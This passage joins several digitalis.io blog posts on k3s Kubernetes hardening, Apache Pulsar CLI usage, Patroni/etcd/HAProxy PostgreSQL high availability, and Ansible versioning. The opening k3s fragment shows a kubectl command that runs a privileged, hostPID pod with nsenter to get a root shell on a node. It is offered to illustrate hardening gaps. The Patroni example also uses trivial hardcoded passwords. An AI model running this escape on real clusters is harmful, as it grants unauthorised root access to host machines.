]
}
}' --rm --attach
Result will be
Error from server (Forbidden): pods "hostname-sudo" is forbidden: PodSecurityPolicy: unable to admit pod: [spec.securityContext.hostNetwork: Invalid value: true: Host network is not allowed to be used spec.securityContext.hostPID: Invalid value: true: Host PID is not allowed to be used spec.containers[0].securityContext.privileged: Invalid value: true: Privileged containers are not allowed]
So we are now able to restrict unprivileged users from doing nasty stuff on our cluster.
What about the admin role? Does that command still work?
~ $ kubectl run hostname-sudo --restart=Never -it --image overriden --overrides '
{
"spec": {
"hostPID": true,
"hostNetwork": true,
"containers": [
{
"name": "busybox",
"image": "alpine:3.7",
"command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-c", "exec /bin/bash"],
"stdin": true,
"tty": true,
"resources": {"requests": {"cpu": "10m"}},
"securityContext": {
"privileged": true
}
}
]
}
}' --rm --attach
If you don't see a command prompt, try pressing enter.
[root@worker01 /]#
So we now have a hardened cluster from base OS to the application level, but as shown above some edge cases still make it insecure.
What we will analyse in the last and final part of this blog series is how to use Sysdig’s Falco security suite to cover even admin roles and RCEs inside PODs.
All the playbooks are available in the Github repo on https://github.com/digitalis-io/k3s-on-prem-production
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
The post K3s – lightweight kubernetes made ready for production – Part 2 appeared first on digitalis.io.
]]>The post K3s – lightweight kubernetes made ready for production – Part 1 appeared first on digitalis.io.
]]>This is part 1 in a three part blog series on deploying k3s, a certified Kubernetes distribution from SUSE Rancher, in a secure and available fashion. A fullying working Ansible project, https://github.com/digitalis-io/k3s-on-prem-production, has been made available to deploy and secure k3s for you.
If you would like to know more about how to implement modern data and cloud technologies, such as Kubernetes, into to your business, we at Digitalis do it all: from cloud migration to fully managed services, we can help you modernize your operations, data, and applications. We provide consulting and managed services on Kubernetes, cloud, data, and DevOps for any business type. Contact us today for more information or learn more about each of our services here.
There are many advantages to running an on-premises kubernetes cluster, it can increase performance, lower costs, and SOMETIMES cause fewer headaches. Also it allows users who are unable to utilize the public cloud to operate in a “cloud-like” environment. It does this by decoupling dependencies and abstracting infrastructure away from your application stack, giving you the portability and the scalability that’s associated with cloud-native applications.
There are obvious downsides to running your kubernetes cluster on-premises, as it’s up to you to manage a series of complexities like:
And added to this there is the inherent complexity of running such a large orchestration application, so running:
And ensuring that all of these components are correctly configured, talk to each other securely (TLS) and reliably.
But is there a simpler solution to this?
K3s is a fully CNCF (Cloud Native Computing Foundation) certified, compliant Kubernetes distribution by SUSE (formally Rancher Labs) that is easy to use and focused on lightness.
To achieve that it is designed to be a single binary of about 45MB that completely implements the Kubernetes APIs. To ensure lightness they removed a lot of extra drivers that are not strictly part of the core, but still easily replaceable with external add-ons.
Being a single binary it’s easy to install and bring up and it internally manages a lot of pain points of K8s like:
So K3s doesn’t even need a lot of stuff on the base host, just a recent kernel and `cgroups`.
All of the other utilities are packaged internally like:
This leads to really low system requirements, just 512MB RAM is asked for a worker node.
Image Source: https://k3s.io/
K3s is a fully encapsulated binary that will run all the components in the same process. One of the key differences from full kubernetes is that, thanks to KINE, it supports not only Etcd to hold the cluster state, but also SQLite (for single-node, simpler setups) or external DBs like MySQL and PostgreSQL (have a look at this blog or this blog on deploying PostgreSQL for HA and service discovery)
The following setup will be performed on pretty small nodes:
We need to have a Highly Available, resilient, load-balanced and Secure cluster to work with. So without further ado, let’s get started with the base underneath, the Nodes. The following 3 part blog series is a detailed walkthrough on how to set up the k3s kubernetes cluster, with some snippets taken from the project’s Github repo: https://github.com/digitalis-io/k3s-on-prem-production
First things first, we need to lay out a compelling network layout for the nodes in the cluster. This will be split in two, EXTERNAL and INTERNAL networks.
This ensures that internal cluster-components communication is segregated from the rest of the network.
Another crucial set up is the firewalld one. First thing is to ensure that firewalld uses iptables backend, and not nftables one as this is still incompatible with kubernetes. This done in the Ansible project like this:
- name: Set firewalld backend to iptables
replace:
path: /etc/firewalld/firewalld.conf
regexp: FirewallBackend=nftables$
replace: FirewallBackend=iptables
backup: yes
register: firewalld_backend
This will require a reboot of the machine.
Also we will need to set up zoning for the internal and external interfaces, and set the respective open ports and services.
For the internal network we want to open all the necessary ports for kubernetes to function:
And we want to have rich rules to ensure that the PODs network is whitelisted, this should be the final result
internal (active)
target: default
icmp-block-inversion: no
interfaces: eth0
sources:
services: cockpit dhcpv6-client mdns samba-client ssh
ports: 2379/tcp 2380/tcp 6443/tcp 80/tcp 443/tcp 7946/udp 7946/tcp 8472/udp 9099/tcp 10250-10255/tcp 30000-32767/tcp 30000-32767/udp
protocols:
masquerade: yes
forward-ports:
source-ports:
icmp-blocks:
rich rules:
rule family="ipv4" source address="10.43.0.0/16" accept
rule family="ipv4" source address="10.44.0.0/16" accept
rule protocol value="vrrp" accept
For the external network we only want the port 80 and 443 and (only if needed) the 6443 for K8s APIs.
The final result should look like this
public (active)
target: default
icmp-block-inversion: no
interfaces: eth1
sources:
services: dhcpv6-client
ports: 80/tcp 443/tcp 6443/tcp
protocols:
masquerade: yes
forward-ports:
source-ports:
icmp-blocks:
rich rules:
Another important part is that selinux should be embraced and not deactivated! The smart guys of SUSE Rancher provide the rules needed to make K3s work with selinux enforcing. Just install it!
# Workaround to the RPM/YUM hardening
# being the GPG key enforced at rpm level, we cannot use
# the dnf or yum module of ansible
- name: Install SELINUX Policies # noqa command-instead-of-module
command: |
rpm --define '_pkgverify_level digest' -i {{ k3s_selinux_rpm }}
register: rpm_install
changed_when: "rpm_install.rc == 0"
failed_when: "'already installed' not in rpm_install.stderr and rpm_install.rc != 0"
when:
- "'libselinux' in ansible_facts.packages"
This is assuming that Selinux is installed (RedHat/CentOS base), if it’s not present, the playbook will skip all configs and references to Selinux.
To be intrinsically secure, a network environment must be properly designed and configured. This is where the Center for Internet Security (CIS) benchmarks come in. CIS benchmarks are a set of configuration standards and best practices designed to help organizations ‘harden’ the security of their digital assets, CIS benchmarks map directly to many major standards and regulatory frameworks, including NIST CSF, ISO 27000, PCI DSS, HIPAA, and more. And it’s further enhanced by adopting the Security Technical Implementation Guide (STIG).
All CIS benchmarks are freely available as PDF downloads from the CIS website.
Included in the project repo there is an Ansible hardening role which applies the CIS benchmark to the Base OS of the Node. Otherwise there are ready to use roles that it’s recommended to run against your nodes like:
https://github.com/ansible-lockdown/RHEL8-STIG/
https://github.com/ansible-lockdown/RHEL8-CIS/
Having a correctly configured and secure operating system underneath kubernetes is surely the first step to a more secure cluster.
We’re going to set up a HA installation using the Embedded ETCD included in K3s.
To start is dead simple, we first want to start the K3s server command on the first node like this
K3S_TOKEN=SECRET k3s server --cluster-init
K3S_TOKEN=SECRET k3s server --server https://<ip or hostname of server1>:6443
How does it translate to ansible?
We just set up the first service, and subsequently the others
- name: Prepare cluster - master 0 service
template:
src: k3s-bootstrap-first.service.j2
dest: /etc/systemd/system/k3s-bootstrap.service
mode: 0400
owner: root
group: root
when: ansible_hostname == groups['kube_master'][0]
- name: Prepare cluster - other masters service
template:
src: k3s-bootstrap-followers.service.j2
dest: /etc/systemd/system/k3s-bootstrap.service
mode: 0400
owner: root
group: root
when: ansible_hostname != groups['kube_master'][0]
- name: Start K3s service bootstrap /1
systemd:
name: k3s-bootstrap
daemon_reload: yes
enabled: no
state: started
delay: 3
register: result
retries: 3
until: result is not failed
when: ansible_hostname == groups['kube_master'][0]
- name: Wait for service to start
pause:
seconds: 5
run_once: yes
- name: Start K3s service bootstrap /2
systemd:
name: k3s-bootstrap
daemon_reload: yes
enabled: no
state: started
delay: 3
register: result
retries: 3
until: result is not failed
when: ansible_hostname != groups['kube_master'][0]
After that we will be presented with a 3 Node cluster working, here the expected output
NAME STATUS ROLES AGE VERSION
master01 Ready control-plane,etcd,master 2d16h v1.20.5+k3s1
master02 Ready control-plane,etcd,master 2d16h v1.20.5+k3s1
master03 Ready control-plane,etcd,master 2d16h v1.20.5+k3s1
- name: Stop K3s service bootstrap
systemd:
name: k3s-bootstrap
daemon_reload: no
enabled: no
state: stopped
- name: Remove K3s service bootstrap
file:
path: /etc/systemd/system/k3s-bootstrap.service
state: absent
- name: Deploy K3s master service
template:
src: k3s-server.service.j2
dest: /etc/systemd/system/k3s-server.service
mode: 0400
owner: root
group: root
- name: Enable and check K3s service
systemd:
name: k3s-server
daemon_reload: yes
enabled: yes
state: started
Another point is to have the masters in HA, so that APIs are always reachable. To do this we will use keepalived, setting up a VIP (Virtual IP) inside the Internal network.
We will need to set up the firewalld rich rule in the internal Zone to allow VRRP traffic, which is the protocol used by keepalived to communicate with the other nodes and elect the VIP holder.
- name: Install keepalived
package:
name: keepalived
state: present
- name: Add firewalld rich rules /vrrp
firewalld:
rich_rule: rule protocol value="vrrp" accept
permanent: yes
immediate: yes
state: enabled
The complete task is available in: roles/k3s-deploy/tasks/cluster_keepalived.yml
vrrp_instance VI_1 {
state BACKUP
interface {{ keepalived_interface }}
virtual_router_id {{ keepalived_routerid | default('50') }}
priority {{ keepalived_priority | default('50') }}
...
Now it’s time for the workers to join! It’s as simple as launching the command, following the task in roles/k3s-deploy/tasks/cluster_agent.yml
K3S_TOKEN=SECRET k3s server --agent https://<Keepalived VIP>:6443
- name: Deploy K3s worker service
template:
src: k3s-agent.service.j2
dest: /etc/systemd/system/k3s-agent.service
mode: 0400
owner: root
group: root
- name: Enable and check K3s service
systemd:
name: k3s-agent
daemon_reload: yes
enabled: yes
state: restarted
NAME STATUS ROLES AGE VERSION
master01 Ready control-plane,etcd,master 2d16h v1.20.5+k3s1
master02 Ready control-plane,etcd,master 2d16h v1.20.5+k3s1
master03 Ready control-plane,etcd,master 2d16h v1.20.5+k3s1
worker01 Ready <none> 2d16h v1.20.5+k3s1
worker02 Ready <none> 2d16h v1.20.5+k3s1
worker03 Ready <none> 2d16h v1.20.5+k3s1
--selinux
--disable traefik
--disable servicelb
As we will be using ingress-nginx and MetalLB respectively.
And set it up so that is uses the internal network
--advertise-address {{ ansible_host }} \
--bind-address 0.0.0.0 \
--node-ip {{ ansible_host }} \
--cluster-cidr={{ cluster_cidr }} \
--service-cidr={{ service_cidr }} \
--tls-san {{ ansible_host }}
The cluster is up and running, now we need a way to use it! We have disabled traefik and servicelb previously to accommodate ingress-nginx and MetalLB.
MetalLB will be configured using layer2 and with two classes of IPs
apiVersion: v1
kind: ConfigMap
metadata:
namespace: metallb-system
name: config
data:
config: |
address-pools:
- name: default
protocol: layer2
addresses:
- {{ metallb_external_ip_range }}
- name: metallb_internal_ip_range
protocol: layer2
addresses:
- {{ metallb_internal_ip_range }}
So we will have space for two ingresses, the deploy files are included in the playbook, the important part is that we will have an internal and an external ingress. Internal ingress to expose services useful for the cluster or monitoring, external to erogate services to the outside world.
We can then simply deploy our ingresses for our services selecting the kubernetes.io/ingress.class
For example, an internal ingress:
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: dashboard-ingress
namespace: kubernetes-dashboard
annotations:
kubernetes.io/ingress.class: "internal-ingress-nginx"
nginx.ingress.kubernetes.io/backend-protocol: "HTTPS"
spec:
rules:
- host: dashboard.192.168.122.200.nip.io
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: kubernetes-dashboard
port:
number: 443
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: my-ingress
namespace: my-service
annotations:
kubernetes.io/ingress.class: "ingress-nginx"
nginx.ingress.kubernetes.io/backend-protocol: "HTTPS"
spec:
rules:
- host: my-service.192.168.1.200.nip.io
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: my-service
port:
number: 443
Mem: total used free shared buff/cache available CPU%
master01: 1.8Gi 944Mi 112Mi 20Mi 762Mi 852Mi 3.52%
master02 1.8Gi 963Mi 106Mi 20Mi 748Mi 828Mi 3.45%
master03 1.8Gi 936Mi 119Mi 20Mi 763Mi 880Mi 3.68%
worker01 1.8Gi 821Mi 119Mi 11Mi 877Mi 874Mi 1.78%
worker02 1.8Gi 832Mi 108Mi 11Mi 867Mi 884Mi 1.45%
worker03 1.8Gi 821Mi 119Mi 11Mi 857Mi 894Mi 1.67%
Good! We now have a basic HA K3s cluster on our machines, and look at that resource usage! In just 1GB of RAM per node, we have a working kubernetes cluster.
Not yet. We need now to secure the cluster and service before continuing!
In the next blog we will analyse how this cluster is still vulnerable to some types of attack and what best practices and remediations we will adopt to prevent this.
Remember – all of the Ansible playbooks for deploying everything are available for you to checkout on Github https://github.com/digitalis-io/k3s-on-prem-production
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
The post K3s – lightweight kubernetes made ready for production – Part 1 appeared first on digitalis.io.
]]>The post Apache Pulsar standalone usage and basic topics appeared first on digitalis.io.
]]>In my last Pulsar post I did a side by side comparison of Apache Kafka and Apache Pulsar. Let’s continue looking at Pulsar a little closer, there are some really interesting things when it comes to topics and the options available.
As with Kafka, Pulsar lets you operate a standalone cluster so you can get the grasp of the basics. For this blog I’m going to assume that you have installed the Pulsar binaries, while you can operate Pulsar in a Docker container or via Kubernetes, I will not be covering those in this post.
In the bin directory of the Pulsar distribution is the pulsar command. This gives you control on starting a standalone cluster or the Zookeeper, Bookkeeper and Pulsar broker components separately. I’m going to start a standalone cluster:
$ bin/pulsar standalone
After a few minutes you will see that the cluster is up and running.
11:02:06.902 [worker-scheduler-0] INFO org.apache.pulsar.functions.worker.SchedulerManager - Schedule summary - execution time: 0.042227224 sec | total unassigned: 0 | stats: {"Added": 0, "Updated": 0, "removed": 0}
{
"c-standalone-fw-localhost-8080" : {
"originalNumAssignments" : 0,
"finalNumAssignments" : 0,
"instancesAdded" : 0,
"instancesRemoved" : 0,
"instancesUpdated" : 0,
"alive" : true
}
}
In the comparison blog post I noted that where Kafka pulls messages from the brokers, Pulsar pushes messages out to consumers. Pulsar uses subscriptions to route messages from the brokers to any number of consumers that are subscribed. The read position of the log is handled by the brokers.
I’m going to create a basic consumer to the standalone cluster. In the bin directory there is a Pulsar client application that we can use without having to code anything, very similar to the Kafka console-producer and console-consumer applications.
$ bin/puslar-client consume sales-trigger -s "st-subscription-1"
Let’s break this command down a little bit.
Once executed you will see in the consumer application output that it has subscribed to the topic and is awaiting for a message.
12:04:50.621 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ConsumerImpl - [sales-trigger][st-subscription-1] Subscribing to topic on cnx [id: 0x049a4567, L:/127.0.0.1:63912 - R:localhost/127.0.0.1:6650], consumerId 0
12:04:50.664 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ConsumerImpl - [sales-trigger][st-subscription-1] Subscribed to topic on localhost/127.0.0.1:6650 -- consumer: 0
You may have noticed that the topic hasn’t been created yet, the consumer is up and running waiting though. Now let’s create the producer and send a message.
Opening another terminal window, I’m going to run the Pulsar client as a producer this time and send a single message.
$ bin/pulsar-client produce sales-trigger --messages "This is a test message"
When executed the producer will connect to the cluster and send the message, the output shows that the message was sent.
13:50:56.342 [main] INFO org.apache.pulsar.client.cli.PulsarClientTool - 1 messages successfully produced
If you are running your own consumer and producer, now take a look at the consumer and see what’s happened, it’s received the message from the broker and then cleanly exited.
----- got message -----
key:[null], properties:[], content:This is a test message
13:50:56.378 [main] INFO org.apache.pulsar.client.impl.PulsarClientImpl - Client closing. URL: pulsar://localhost:6650/
13:50:56.404 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ConsumerImpl - [sales-trigger] [st-subscription-1] Closed consumer
13:50:56.409 [pulsar-client-io-1-1] INFO org.apache.pulsar.client.impl.ClientCnx - [id: 0x049a4567, L:/127.0.0.1:63912 ! R:localhost/127.0.0.1:6650] Disconnected
13:50:56.422 [main] INFO org.apache.pulsar.client.cli.PulsarClientTool - 1 messages successfully consumed
$
If you are used to using Kafka you would expect your consumer client to wait for any more messages from the broker, however, with Pulsar this is not the default behaviour of the client application.
Ideally the client consumer should keep running, awaiting more messages from the brokers. There is an additional flag in the client that can be set.
$ bin/puslar-client consume sales-trigger -s "st-subscription-1" -n 0
The -n flag stands for the number of messages to accept before the consumer disconnects from the cluster and closes, the default is 1 message, if set to 0 then no limit is set and it will consume any messages the brokers push to it.
Like the consumer settings, the producer can send multiple messages in one execution
$ bin/pulsar-client produce sales-trigger --messages "This is a test message" -n 100
With the -n flag in the produce mode, the client will send one hundred messages to the broker.
15:01:03.339 [main] INFO org.apache.pulsar.client.cli.PulsarClientTool - 100 messages successfully produced
The active consumer will receive the messages and await more.
----- got message -----
key:[null], properties:[], content:This is a test message
----- got message -----
key:[null], properties:[], content:This is a test message
----- got message -----
key:[null], properties:[], content:This is a test message
----- got message -----
key:[null], properties:[], content:This is a test message
----- got message -----
key:[null], properties:[], content:This is a test message
You may have noticed in the consumer output that along with the content of the message are two other sections, a key and properties.
Each message can have a key, optional but highly advised. Properties are based on key/value pairs, you have multiple properties by comma separating them. Supposing I want to have an action property with some form of command and the key being the current Unix timestamp, the client would look like the following:
$ bin/pulsar-client produce sales-trigger --messages "This is a test message" -n 100 -p action=create -k `date +%s`
As the consumer is still running, awaiting new messages, you will see the output with the key and properties.
----- got message -----
key:[1611328125], properties:[action=create], content:This is a test message
There are few differences between Kafka and Pulsar when it comes to persistence of messages. By default Pulsar will assume a topic is classed as persistent and will save messages to the Bookkeeper instances (called Bookies).
Whereas Kafka has a time to live for messages regardless of whether the consumer has read the message or not, the default is seven days (168 hours), Pulsar will keep the messages persisted. Once all subscribed consumers have successfully read the messages and acknowledged so back to the broker, the messages will then be removed from storage.
Pulsar can be configured, and should be in production environments, to have a time-to-live (TTL) for messages held in persistent storage.
If you wish for topic messages to be stored within memory and not to disk then non-persistent topics are available.
Creating non-persistent topics can be done for the client but require the full namespace configuration.
$ bin/pulsar-client consume non-persistent://public/default/sales-trigger2 -s "st-subscription-2" -n 0
$ bin/pulsar-client consume persistent://public/default/sales-trigger2 -s "st-subscription-2" -n 0
The Pulsar admin client handles all aspects of the cluster from the command, this includes broker, bookies, topics and TTL configurations and specific configurations for named subscriptions if required.
For now, let’s just list the topics I’ve been working with in this post:
$ bin/pulsar-admin topics list public/default
"non-persistent://public/default/sales-trigger2"
"persistent://public/default/sales-trigger"
This post should give you a basic starting point of how the Pulsar client and the standalone cluster work. Consumers and producers give us the backbone of a streaming application, with the added features such as whether a topic is persistent or non-persistent (in memory).
All this has been done from the command line, in a future post I’ll look at putting a basic Producer and Consumer application together in code.
If you would like to know more about how to implement modern data, streaming and cloud technologies into your business, we at Digitalis do it all: from cloud migration to fully managed services, we can help you modernize your operations, data, streaming and applications. We provide consulting and managed services on cloud, data, and DevOps for any business type. Contact us for more information.
DevOps Engineer and Developer
With over 30 years’ of experience in software, customer loyalty data and big data, Jason now focuses his energy on Kafka and Hadoop. He is also the author of Machine Learning: Hands on for Developers and Technical Professionals. Jason is considered a stalwart in the Kafka community. Jason is a regular speaker on Kafka technologies, AI and customer and client predictions with data.
If you want to understand how to easily ingest data from Kafka topics into Cassandra than this blog can show you how with the DataStax Kafka Connector.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
The post Apache Pulsar standalone usage and basic topics appeared first on digitalis.io.
]]>The post Deploying PostgreSQL for High Availability with Patroni, etcd and HAProxy – Part 2 appeared first on digitalis.io.
]]>In the first part of this blog we configured an etcd cluster on top of three CentOS 7 servers. We had to tweak the operating system configuration in order to have everything running smoothly. In this post we’ll see how to configure Patroni using the running etcd cluster as a distributed configuration store (DCS) and HAProxy to route connections to the active leader.
The patroni configuration is a yaml file divided in sections with each section controlling a specific part of the patroni behaviour. We’ll save the patroni configuration file in /etc/patroni/patroni.yml
Let’s have a look at the configuration file in detail.
The keys scope, namespace and name properties in the yml file control the node cluster’s membership – the namespace is where the cluster is created within the DCS and the identification for the node.
This comes quite handy if we have a dedicated DCS cluster with multiple patroni clusters configured. We can define either a namespace for each cluster or store multiple clusters within the same namespace.
Scope and namespace are the same across the three nodes, the name value must be within the cluster.
Our example we’ll have the following settings:
# patroni01
scope: region_one
namespace: /patroni_test/
name: patroni01
# patroni02
scope: region_one
namespace: /patroni_test/
name: patroni02
# patroni03
scope: region_one
namespace: /patroni_test/
name: patroni02
The restapi dictionary defines the configuration for the REST API used by patroni. In particular, the key listen – this defines the address and the port where the REST API service listens. Similarly the key connect_address – this defines the address and port used by patroni for querying the REST API.
The restapi can be secured by defining the path to the certificate file and key using the certfile and keyfile configuration options. It’s also possible to configure authentication for the restapi using the authentication configuration option within restapi config.
In a production setting it would be reccomended to enable the above security options. However, in our example the restapi is configured in a simple fashion, with no security enabled, as below.
#patroni 01
restapi:
listen: 192.168.56.40:8008
connect_address: 192.168.56.40:8008
#patroni 02
restapi:
listen: 192.168.56.41:8008
connect_address: 192.168.56.41:8008
#patroni 02
restapi:
listen: 192.168.56.42:8008
connect_address: 192.168.56.42:8008
Obviously, the ip address is machine specific.
The etcd: configuration value is used to define the connection to the DCS if etcd is used. In our example we store all the participating hosts in the key hosts as a comma separated string.
The configuration in our example is the same on all of the patroni nodes and is the following
etcd:
hosts: 192.168.56.40:2379,192.168.56.41:2379,192.168.56.42:2379
The bootstrap section is used during the bootstrap of the patroni cluster.
The contents of the dcs configuration is written into the DCS in the position /<namespace>/scope/config after the patroni cluster is initialized.
The data stored in the DCS is then used as the global configuration for all the members in the cluster and should be managed only by interacting via patronictl or REST api call.
However some parameters like ttl, loop_wait etc. are dynamic and read from the DCS in a global fashion. Other parameters like postgresql.listen, postgresql.data_dir are local to the node and shall be set in the configuration file instead.
In our example we are setting up the bootstrap section in this way.
bootstrap:
dcs:
ttl: 10
loop_wait: 10
retry_timeout: 10
maximum_lag_on_failover: 1048576
postgresql:
use_pg_rewind: true
parameters:
initdb:
- encoding: UTF8
- data-checksums
pg_hba:
- host replication replicator 0.0.0.0/0 md5
- host all all 0.0.0.0/0 md5
users:
The dcs section defines the behaviour of the check against the DCS to manage the primary status and the eventual new leader election.
We are also configuring the postgresql dictionary to initialize the cluster with certain parameters. The initdb list defines options to pass to initdb, during the bootstrap process (e.g. cluster encoding or the checksum usage).
The pg_hba list defines the entries in pg_hba.conf set after the cluster is initialized.
The users key defines additional users to create after initializing the new cluster. In our example is empty.
The postgresql section defines the node specific settings. Our configuration is the following.
postgresql:
listen: "*:6432"
connect_address: patroni01:6432
data_dir: /var/lib/pgsql/data/postgresql0
bin_dir: /usr/pgsql-13/bin/
pgpass: /tmp/pgpass0
authentication:
replication:
username: replicator
password: replicator
superuser:
username: postgres
password: postgres
rewind:
username: rewind_user
password: rewind
parameters:
In particular the key listen is used by patroni to set the postgresql.conf parameters listen_addresses and port.
The key connect_address defines the address and the port through which Postgres is accessible from other nodes and applications.
The key data_dir is used to tell patroni the path of the cluster’s data directory.
The key bin_dir is used to tell patroni where the PostgreSQL binaries are located.
The key pg_pass specifies the filename of the password authentication file used by patroni to connect to the running PostgreSQL database.
The authentication dictionary is used to define the connection parameters for the replication user, the super user and the rewind user if we are using pg_rewind to remaster an old primary.
In order to have patroni started automatically we need to setup a systemd unit file in /etc/systemd/system. We name our file patroni.service with the following contents.
[Unit]
Description=Runners to orchestrate a high-availability PostgreSQL
After=syslog.target network.target
[Service]
Type=simple
User=postgres
Group=postgres
WorkingDirectory=/var/lib/pgsql
# Start the patroni process
ExecStart=/bin/patroni /etc/patroni/patroni.yml
# Send HUP to reload from patroni.yml
ExecReload=/bin/kill -s HUP $MAINPID
# only kill the patroni process, not its children, so it will gracefully stop postgres
KillMode=process
# Give a reasonable amount of time for the server to start up/shut down
TimeoutSec=30
# Do not restart the service if it crashes, we want to manually inspect database on failure
Restart=no
[Install]
WantedBy=multi-user.target
After the service file creation we need to make systemd aware of the new service.
Then we can enable the service and start it.
sudo systemctl daemon-reload
sudo systemctl enable patroni
sudo systemctl start patroni
As soon as we start the patroni service we should see PostgreSQL bootstrap on the first node.
We can monitor the process via patronictl with the following command:
patronictl -c /etc/patroni/patroni.yml list
The output is something like this:
We can then start the patroni service on the other two nodes to make the follower join the cluster. By default patroni will build the new replicas by using pg_basebackup.
When all the nodes are up and running the patronictl command output will change in this way.
In order to have the connection routed to the active primary we need to configure the HAProxy service in a proper way.
First we need to have HAProxy to listen for connections on the PostgreSQL standard port 5432. Then HAProxy should check the patroni api to determine which node is the primary.
This is done with the following configuration.
global
maxconn 100
defaults
log global
mode tcp
retries 2
timeout client 30m
timeout connect 4s
timeout server 30m
timeout check 5s
listen stats
mode http
bind *:7000
stats enable
stats uri /
listen region_one
bind *:5432
option httpchk
http-check expect status 200
default-server inter 3s fall 3 rise 2 on-marked-down shutdown-sessions
server patroni01 192.168.56.40:6432 maxconn 80 check port 8008
server patroni02 192.168.56.41:6432 maxconn 80 check port 8008
server patroni03 192.168.56.42:6432 maxconn 80 check port 8008
This example configuration enables the HAProxy statistics on port 7000. The region_one section is named after the patroni scope for consistency and listens on the port 5432. Each patroni server is listed as a server to be checked on port 8008, the REST api port, to determine whether the node is up.
After configuring starting HAProxy on each node we will be able to connect on any of the nodes and end always on the primary. In case of failover the connection will drop and at the next connection attempt we’ll connect to the new primary.
This simple example shows how to set up a three node Patroni cluster without no single point of failure (SPOF). To do this we have etcd configured in a cluster with a member installed on each database node. In a similar fashion we have HAProxy insatlled and running on each database node.
However for production it would be reccomended to setup etcd on dedicated hosts and configure SSL for etcd and the Patroni REST APIs, if the network is not trusted or to avoid accidents.
Additionally, for HAProxy in production it is strongly suggested to have a load balancer capable of checking if the HAProxy service is available before attempting a connection.
Having an up and running Patroni cluster requires a lot of configuration. Therefore it is strongly recommended to use a configuration management tool such as Ansible to deploy and confgure your cluster.
If you would like to know more about how to implement modern data and cloud technologies, such as PostgreSQL, into to your business, we at Digitalis do it all: from cloud migration to fully managed services, we can help you modernize your operations, data, and applications. We provide consulting and managed services on cloud, data, and DevOps for any business type. Contact us for more information.
If you want to understand how to easily ingest data from Kafka topics into Cassandra than this blog can show you how with the DataStax Kafka Connector.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
The post Deploying PostgreSQL for High Availability with Patroni, etcd and HAProxy – Part 2 appeared first on digitalis.io.
]]>The post Ansible Versioning appeared first on digitalis.io.
]]>If you are reading this blog you probably know what Ansible is but in case this is new to you, let me give you a brief introduction.
In the past servers were installed and configured manually. This was quite tedious but ok when there were only a few servers to manage. However nowadays, the number of servers and their complexity, under management in the average company, has increased exponentially. Even more so when we talk about Infrastructure As Code when the servers are transient.
Also doing things manually often leads to errors and discrepancies between configurations and servers.
That is how automation came to be. There are multiple options these days probably the most widely used are Puppet, Chef and Ansible. All three allow us to manage the configuration of multiple servers in a way that is repeatable to ensure all servers have the same settings and that any new server we add into the mix will be identical to the others.
However the orchestration software is only going to be as good as the version and code management. If you do not keep track of the changes you’re making to (in our case) the Ansible code you will eventually have different configurations on servers and unrepeatable infrastructure.
- hosts: all
vars:
env: production
var_files:
- "vars/{{ env }}.yml"
tasks:
- name: Install nginx
package:
name: nginx
state: present
The above example is a very simple playbook for installing nginx which reads the environment parameters from a file imported on runtime based on the env variable.
The most common way of keeping track of your changes to Ansible is using version control and the best version control software at the moment is git. People starting up with git find it slightly daunting to begin with but it is pretty powerful and used around the world.
By keeping your Ansible code in a git repository you will be able to track changes to the code. If you’re working on a project with little collaboration it is easy to fall into the temptation of committing all your changes straight into the master branch. After all, it’s just you and you know what you have done, right?
It may well be you have a fantastic memory and you are able to keep track but once multiple people start working on the same repository you will very quickly lose sight. Furthermore your configuration changes will no longer be repeatable. You cannot (easily) go back to the code you created two months ago and use it to set up a server. See the use case below:
Let’s have a look at a use case and see what would happen depending on whether you are using versioned code or not (a bit more on versioning in the next section).
You have 10 servers in development and 20 in production. Your production servers have been running for the last year with no issues and very few updates. In the meantime you’ve been working on a new feature and testing it in the development servers.
Suddenly you’re in urgent need of building 5 more servers in production:
As you can see having a versioned deployment would have helped in this case. This is a very simplistic way of explaining it but you can probably see how much of an advantage it is to use versions. Knowing what’s on each of your environments as oppose to thinking you know will add a large amount of peace of mind to your daily work.
Companies and individuals may take different approaches at versioning the git repositories. At the core of our version control we use branches and tags. We use branches to separate the work stream between individuals or projects and tags to mark a fixed point in time, for example, project end.
A branch is simply a fork of your code you keep separated from the main branch (usually called master ) where you can record your changes until they are ready for mainstream use at which point you would merge them with the master branch.
A tag by contract is a fixed point in time. Tags are immutable. Once created they have no further history or commits.
We allow deployments into development from git branches but we don’t allow deployments into the rest of the environments other than from tags (known versions).
We prefer to use tags in the format MAJOR.MINOR.HOTFIX (ie, 1.1.0). This type of versioning is called semantic versioning.
Major version change should only occur when it is materially different to the previous version or includes backward incompatible changes.
Progression over last version such as new feature of improvement over existing.
Applies a correction to existing repository without carrying forward new code.
I’m not going to explain how to create tags but I will go into some detail on how we manage hot fixes as this is quite different between companies. In this scenario we have a product called productX and we’re running version 2.0.0 on production.
We have confirmed there is bug and we need to update a single parameters on our Ansible code. If we take the current code on our repository and tag it as 2.13.0, which would be the next logical version number, we will be taking with us all changes between versions and the HEAD of the git repository, many of which have never gone through testing. What we do instead is we create a tag using the current version as a base. That way your version will be identical to the production version except for the fix you just introduced.
[(master)]$ git checkout -b hotfix/2.0.1 2.0.0
Switched to a new branch 'hotfix/2.0.1'
[(hotfix/2.0.1)]$ echo hotfix > README.md
